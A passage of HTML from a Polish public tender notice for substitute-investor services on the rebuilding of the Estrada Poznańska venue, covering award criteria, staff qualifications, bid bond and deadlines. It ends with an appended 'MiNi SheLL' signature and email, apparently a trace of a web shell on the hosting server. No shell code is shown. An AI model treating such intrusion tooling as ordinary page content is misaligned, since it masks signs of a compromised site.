Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Podkryterium 1 - Doświadczenie inspektora nadzoru robót budowlanych – waga 20% (max. 20 pkt.):</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie inspektora nadzoru robót elektrycznych – waga 20% (max. 20 pkt.):</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale VIII SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym: <br/>Zamawiający nie stawia warunku w powyższym zakresie<br/><br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie <br/><br/>3)	sytuacji ekonomicznej lub finansowej:<br/>Wykonawca spełni warunek udziału w postępowaniu dotyczący sytuacji ekonomicznej lub finansowej jeżeli wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną w wysokości minimum 1.000.000,00 zł i posiada zdolność kredytową lub środki finansowe na kwotę nie mniejszą niż 1.000.000,00 zł.<br/><br/>4)	zdolności technicznej lub zawodowej: <br/>a)	Wykonawca spełni warunek jeśli wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie, a w przypadku świadczeń powtarzających się lub ciągłych również wykonuje należycie co najmniej dwie usługi polegające na pełnieniu funkcji Inwestora Zastępczego lub Inżyniera Kontraktu nad realizacją Inwestycji przy budowie, nadbudowie lub przebudowie budynków użyteczności publicznej, o wartości min. 10.000.000,00 zł brutto każda z nich. Zamawiający wymaga również, aby zakres nadzorowanych robót w ramach każdej z usług dotyczył co najmniej robót ogólnobudowlanych, sanitarnych i elektrycznych. Powyższe usługi muszą obejmować bieżące i ostateczne rozliczenie Inwestycji. <br/><br/>Przez pełnienie funkcji Inwestora Zastępczego lub Inżyniera Kontraktu nad realizacją Inwestycji Zamawiający rozumie usługę polegającą w szczególności na reprezentowaniu Zamawiającego (Inwestora) na budowie, zapewnieniu Kierownika Zespołu Inwestora Zastępczego, specjalistę ds. akustyki, a także Inspektorów Nadzoru Inwestorskiego (Inspektora nadzoru robót budowlanych, Inspektor nadzoru robót elektrycznych, Inspektor nadzoru robót sanitarnych), posiadających właściwe uprawnienia do prowadzenia nadzorów wraz z koordynowaniem ich prac (uprawnienia te szczegółowo zostały opisane w rozdz. VII pkt 2 ppkt 4) lit. b) SWZ), wykonanie rozliczeń budowy, udział w odbiorach inwestorskich budynku, weryfikacji dokumentacji powykonawczej, nadzór nad realizacją Umowy z Wykonawcą robót budowlanych.<br/><br/>Przez wartość robót budowlanych Zamawiający rozumie wysokość wynagrodzenia otrzymanego przez Generalnego Wykonawcę od inwestora z tytułu ich wykonania.<br/><br/>Warunek udziału w postępowaniu musi być spełniony:<br/>	przez wykonawcę samodzielnie, lub<br/>	w przypadku wykonawców występujących wspólnie, samodzielnie przez jednego z wykonawców występujących wspólnie, lub<br/>	przez podmiot udostępniający samodzielnie<br/><br/>Uwaga: Zamawiający wymaga, by nadzorowane roboty, o których mowa w ww. warunku, tj. nad którymi Wykonawca pełnił nadzór, były ukończone i odebrane jako zgodne ze sztuką budowlaną. <br/><br/>W przypadku, gdy złożone przez Wykonawców dokumenty na potwierdzenie spełniania warunków udziału w postępowaniu będą zawierały kwoty wyrażone w walutach innych niż PLN, do oceny spełniania każdego warunku zawierającego daną kwotę lub wartość, wielkości te Wykonawca przeliczy po średnim kursie waluty obcej ogłoszonym przez NBP w dniu zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych lub w kolejnym dniu, jeżeli w dniu publikacji ogłoszenia NBP nie ogłosi średnich kursów walut.<br/><br/>b)	Wykonawca spełni warunek, jeżeli wykaże, iż dysponuje lub ma możliwość dysponowania odpowiednim personelem składającym się na Zespół Inwestora Zastępczego tj.:<br/>1)	Kierownikiem Zespołu Inwestora Zastępczego – osoba kierująca Zespołem Inspektorów:<br/>o	posiadającym co najmniej 5-letnie doświadczenie zawodowe w zarządzaniu zespołem Inwestora Zastępczego lub Zespołem Inspektorów Nadzoru lub Inżyniera Kontraktu;<br/><br/>2)	Inspektorem nadzoru robót budowlanych:<br/>o	posiadającym uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie do projektowania i kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej;<br/>o	spełniającym wymagania, o których mowa w art. 37c ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami (t.j. Dz. U. z 2022 r., poz. 840 ze zm.);<br/>o	posiadającym co najmniej 5-letnie doświadczenie zawodowe (liczone od dnia otrzymania uprawnień) w zarządzaniu lub nadzorze nad realizacją robót konstrukcyjno-budowlanych na stanowisku kierownika robót lub kierownika budowy lub inspektora nadzoru budowlanego ww. specjalności przy realizacji robót budowlanych, w tym w zakresie nadzoru lub kierowaniu robotami w budynku użyteczności publicznej o wartości co najmniej 10.000.000,00 zł brutto; <br/><br/>3)	Inspektorem nadzoru robót elektrycznych:<br/>o	posiadającym uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie do projektowania i kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej, w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych;<br/>o	spełniającym wymagania, o których mowa w art. 37c ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami (t.j. Dz. U. z 2022 r., poz. 840 ze zm.);<br/>o	posiadającym co najmniej 5-letnie doświadczenie zawodowe (liczone od dnia otrzymania uprawnień) w zarządzaniu lub nadzorze nad realizacją robót elektrycznych i elektroenergetycznych na stanowisku kierownika robót lub kierownika budowy lub inspektora nadzoru budowlanego ww. specjalności przy realizacji robót budowlanych, tym w zakresie nadzoru lub kierowania robotami w budynku użyteczności publicznej o wartości co najmniej 10.000.000,00 zł brutto; <br/><br/>4)	Inspektorem nadzoru robót sanitarnych:<br/>o	posiadającym uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie do projektowania i kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej, w zakresie sieci sanitarnych i instalacji, urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych;<br/>o	spełniającym wymagania, o których mowa w art. 37c ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami (t.j. Dz. U. z 2022 r., poz. 840 ze zm.);<br/>o	posiadającym co najmniej 5-letnie doświadczenie (liczone od dnia otrzymania uprawnień) w zarządzaniu lub nadzorze nad realizacją robót instalacyjnych na stanowisku kierownika robót lub kierownika budowy lub inspektora nadzoru budowlanego ww. specjalności przy realizacji robót budowlanych, w tym w zakresie nadzoru prac w budynku użyteczności publicznej o wartości co najmniej 10.000.000,00 zł brutto; <br/> <br/><br/>5)	Specjalistą ds. akustyki:<br/>o	posiadającym wykształcenie wyższe (magisterskie – II stopnia lub inżynierskie – II stopnia) na kierunku akustyka oraz co najmniej 5-letnie doświadczenie zawodowe w zawodzie akustyka, licząc od dnia uzyskania wykształcenia.<br/><br/>Zamawiający dopuszcza łączenie ww. funkcji przez jedną osobę, jeśli wykazana osoba posiada wymagane uprawnienia i doświadczenie.<br/><br/>Wymogi w zakresie posiadanych uprawnień budowlanych muszą być zgodne z przepisami ustawy z dnia 7 lipca 1994 r. - Prawo budowlane oraz zgodne z rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (t.j. Dz.U. z 2019 r. poz. 831 ze zm.) uprawniające do realizacji zadań objętych przedmiotem zamówienia lub im odpowiadające uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, uprawniające do realizacji zadań objętych przedmiotem zamówienia. W przypadku wykonawców zagranicznych, dopuszcza się równoważne kwalifikacje, zdobyte w innych państwach, na zasadach określonych w art. 12a ustawy z dnia 7 lipca 1994 r. – Prawo budowlane, z uwzględnieniem postanowień ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (t.j. Dz.U. z 2023 r. poz. 334 ze zm.). <br/><br/>Warunek udziału w postępowaniu musi być spełniony:<br/>	przez wykonawcę samodzielnie, lub<br/>	w przypadku wykonawców występujących wspólnie, łącznie przez wykonawców występujących wspólnie, lub<br/>	przez podmiot udostępniający samodzielnie lub łącznie przez wykonawcę i podmiot udostępniający zasoby.<br/><br/>3.	Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia.<br/>4.	Ocena spełnienia ww. warunków przez wykonawców, będzie dokonywana wg zasady: spełnia/nie spełnia, na podstawie przedłożonych przez wykonawców oświadczeń i dokumentów. Z treści dokumentów musi jednoznacznie wynikać, iż wykonawca spełnił ww. warunki. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Dokumenty składane przez Wykonawcę na żądanie Zamawiającego potwierdzające brak<br/>podstaw do wykluczenia obejmują:<br/>1) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku<br/>przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007<br/>r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2024 r. poz. 594 ze zm.), z innym<br/>wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie<br/>do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy<br/>kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie<br/>oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu<br/>niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej -<br/>załącznik nr 4 do SWZ;<br/>2) oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniach –<br/>załącznik nr 9 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe potwierdzające przez Inwestora Zastępczego spełnianie<br/>warunków udziału składane przez Inwestora Zastępczego na wezwanie Zamawiającego w<br/>postępowaniu obejmują:<br/>1) wykaz dostaw lub usług wykonanych, a w przypadku świadczeń powtarzających się lub<br/>ciągłych również wykonywanych, w okresie ostatnich 5 lat, a jeżeli okres prowadzenia<br/>działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat<br/>wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są<br/>wykonywane, oraz załączeniem dowodów określających, czy te dostawy lub usługi<br/>zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których<br/>mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub<br/>ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest<br/>w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku<br/>świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne<br/>dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w<br/>okresie ostatnich 3 miesięcy – załącznik nr 5 do SWZ;<br/>2) wykaz osób, skierowanych przez Inwestora Zastępczego do realizacji niniejszego<br/>zamówienia publicznego, odpowiedzialnych za nadzorowanie robót budowlanych wraz<br/>z informacją nt. ich uprawnień i doświadczenia niezbędnego do wykonania przez nich<br/>czynności oraz informację o podstawie dysponowania tymi osobami wraz z<br/>oświadczeniem, że osoby odpowiedzialne za nadzorowanie robót, o których mowa w<br/>Rozdziale VII ust. 2. pkt 4) lit. b) SWZ, posiadają wymagane uprawnienia – załącznik<br/>nr 6 do SWZ;<br/>3) informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą<br/>wysokość posiadanych środków finansowych lub zdolność kredytową Inwestora<br/>Zastępczego, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem;<br/>4) dokumenty potwierdzające, że Inwestor Zastępczy jest ubezpieczony od<br/>odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z<br/>przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia.<br/>6. Jeżeli wykonawca nie złoży oświadczenia potwierdzającego okoliczności, o których mowa<br/>w art. 125 ust. 1 ustawy PZP – o niepodleganiu wykluczeniu oraz spełnianiu warunków<br/>udziału w postępowaniu, lub jest ono niekompletne, zawierają błędy lub budzi wskazane<br/>prze Zamawiającego wątpliwości, Zamawiający wezwie wykonawcę do ich złożenia,<br/>poprawienia, uzupełnienia, wyjaśnienia w terminie przez siebie wskazanym, chyba, że<br/>mimo ich złożenia, uzupełnienia, poprawienia oferta wykonawcy podlegałaby odrzuceniu<br/>lub konieczne byłoby unieważnienie postępowania.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedmiotowych środków dowodowych w postępowaniu. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający wymaga wniesienia wadium w wysokości 10.000,00 zł (słownie: dziesięć tysięcy złotych).<br/>2.	Wadium może być wniesione według wyboru Wykonawcy w:<br/>a)	pieniądzu, przelewem na konto: 33 1240 6595 1111 0010 5210 6366<br/>b)	gwarancjach bankowych,<br/>c)	gwarancjach ubezpieczeniowych,<br/>d)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z 2024 r., poz. 419 ze zm.).<br/>3.	W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja powinna być sporządzona zgodnie z obowiązującym prawem i musi zawierać następujące elementy:<br/>a)	nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib,<br/>b)	określenie wierzytelności, która ma być zabezpieczona gwarancją,<br/>c)	kwotę gwarancji,<br/>d)	termin ważności gwarancji,<br/>e)	zobowiązanie gwaranta do: „zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż:<br/>	wykonawca w odpowiedzi na wezwanie Zamawiającego nie złożył podmiotowych środków dowodowych lub przedmiotowych środków dowodowych potwierdzających, iż nie podlega on wykluczeniu lub/oraz spełnia warunki udziału w postępowaniu lub innych dokumentów i oświadczeń niezbędnych do przeprowadzenia danego postępowania o udzielenie zamówienia publicznego, a także w sytuacji, gdy nie wyraził on zgody na poprawienie omyłek, o których mowa w art. 223 ust. 2 pkt 3 PZP – co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej,<br/><br/>lub, że<br/><br/>	wykonawca, którego oferta została wybrana:<br/>•	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie lub<br/>•	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy lub<br/>•	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy, którego oferta została wybrana.<br/><br/>UWAGA: Postanowienia ust. 3 stosuje się odpowiednio do poręczeń, określonych powyżej w ust. 2 lit. d). <br/><br/>Wniesione wadium przez Wykonawców wspólnie ubiegających się o zamówienie w postaci gwarancji lub poręczenia musi wyraźnie wskazywać, iż jest ono wystawione na rzecz wszystkich podmiotów składających ofertę wspólną.<br/><br/>4.	Wadium wnoszone w pieniądzu należy wpłacić na następujący rachunek Zamawiającego: 33 1240 6595 1111 0010 5210 6366. <br/>5.	Do oferty należy dołączyć kopię polecenia przelewu potwierdzoną za zgodność z oryginałem, w tytule przelewu należy wpisać: Wadium – „Pełnienie funkcji Inwestora zastępczego przy realizacji zadania inwestycyjnego pn.: „Przebudowa budynku Estrady Poznańskiej wraz z dostawą sprzętu i wyposażenia”. <br/>6.	Wadium wnoszone w innych dopuszczonych przez Zamawiającego formach należy złożyć przekazując Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>7.	Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy. Wzór oświadczenia stanowi załącznik nr 7 do SWZ. <br/>4.	Oświadczenie potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie, we własnym imieniu, chyba, że co innego wynika z załączonych do oferty pełnomocnictw. <br/>5.	W przypadku wspólnego ubiegania się o udzielenie zamówienia, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z art. 454 oraz art. 455 ustawy Prawo zamówień publicznych z dnia 11 września 2019 roku <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-20 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/estrada.poznan</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-20 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający wymaga wniesienia zabezpieczenia należytego wykonania umowy w<br/>wysokości 5% ceny całkowitej podanej w ofercie uwzględniającej podatek VAT.<br/>2. Zabezpieczenie służy pokryciu roszczeń z tytułu niewykonania lub nienależytego<br/>wykonania umowy.<br/>3. Zabezpieczenie może być wnoszone, według wyboru Wykonawcy, w jednej lub w kilku<br/>następujących formach:<br/>a) pieniądzu, przelewem na konto: 33 1240 6595 1111 0010 5210 6366, z adnotacją<br/>„Pełnienie funkcji Inwestora zastępczego przy realizacji zadania<br/>inwestycyjnego pn.: „Przebudowa budynku Estrady Poznańskiej wraz z<br/>dostawą sprzętu i wyposażenia”.<br/>b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowokredytowej,<br/>z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;<br/>c) gwarancjach bankowych;<br/>d) gwarancjach ubezpieczeniowych;<br/>e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy<br/>z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>4. Zamawiający dokona zwrotu zabezpieczenia należytego wykonania umowy w podanych<br/>terminach oraz wysokościach:<br/>a) 70% wartości wniesionego zabezpieczenia należytego wykonania umowy, Zamawiający<br/>zwróci w terminie 30 dni od daty rozliczenia końcowego robót budowlanych i dostaw <br/>realizowanych w ramach Inwestycji,<br/>b) 30% wartości wniesionego zabezpieczenia należytego wykonania umowy, Zamawiający<br/>zwróci w terminie 15 dni po upływie okresu rękojmi za wady.

Creat By MiNi SheLL
Email: jattceo@gmail.com